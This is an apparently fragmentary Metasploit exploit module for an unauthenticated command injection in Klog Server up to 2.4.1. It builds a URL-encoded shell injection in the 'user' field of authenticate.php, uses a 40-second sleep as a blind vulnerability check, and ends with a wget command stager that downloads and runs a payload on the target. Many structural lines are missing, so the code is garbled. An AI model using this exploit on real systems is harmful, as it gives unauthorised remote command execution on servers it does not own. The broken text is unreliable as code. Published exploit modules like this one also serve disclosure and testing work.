# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
'Name' => 'Klog Server Unauthenticated Command Injection Vulnerability',
This module exploits an unauthenticated command injection vulnerability in Klog Server <= 2.4.1.
"user" parameter is executed via shell_exec() function without input validation.
'License' => MSF_LICENSE,
[ 'B3KC4T', # Vulnerability discovery
'Metin Yunus Kandemir', # Metasploit module
['URL', 'https://docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection']
'HttpClientTimeout' => 2,
'Platform' => [ 'unix', 'linux' ],
['Klog Server 2.4.1 (x64)', {
'DisclosureDate' => "2021-01-05",
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('TARGETURI', [true, 'The base path of the Klog Server', '/']),
def filter_bad_chars(cmd)
cmd.gsub!(/chmod \+x/, 'chmod 777')
def execute_command(cmd, opts = {})
command_payload = "unsafe+%22%26+#{filter_bad_chars(cmd)}%26%22"
print_status("Sending stager payload...")
'uri' => normalize_uri(uri, 'actions', 'authenticate.php'),
'encode_params' => false,
'user' => command_payload,
if res && res.code == 302
print_error("The target is not vulnerable!")
print_good("The target is vulnerable!")
'uri' => normalize_uri(uri, 'actions', 'authenticate.php'),
'encode_params' => false,
'user' => "unsafe+%22%26sleep+40%26%22", #checking blind command injection via sleep
if res && res.code == 302
return Exploit::CheckCode::Safe
return Exploit::CheckCode::Vulnerable
print_status("Exploiting...")
execute_cmdstager(flavor: :wget, delay: 10)